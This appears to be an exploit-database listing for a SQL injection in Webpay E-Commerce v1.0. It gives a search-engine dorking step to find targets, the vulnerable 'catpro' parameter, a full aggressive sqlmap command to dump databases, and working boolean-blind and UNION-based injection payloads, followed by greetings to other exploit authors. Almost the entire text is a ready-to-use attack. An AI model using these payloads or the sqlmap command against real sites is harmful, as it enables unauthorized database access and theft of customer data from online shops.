Share
## https://sploitus.com/exploit?id=PACKETSTORM:181277
=============================================================================================================================================  
| # Title : Webpay E-Commerce v1.0 SQL Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |  
| # Vendor : http://webpay.com.np/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] use payload : catproduct.php?catpro=6  
  
[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs  
  
[+] Parameter: catpro (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: catpro=6' AND 5853=5853-- KEle  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 15 columns  
Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================